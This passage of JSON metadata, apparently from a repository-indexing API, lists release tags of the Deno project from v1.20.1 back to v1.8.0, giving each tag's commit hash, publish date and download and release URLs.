9744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases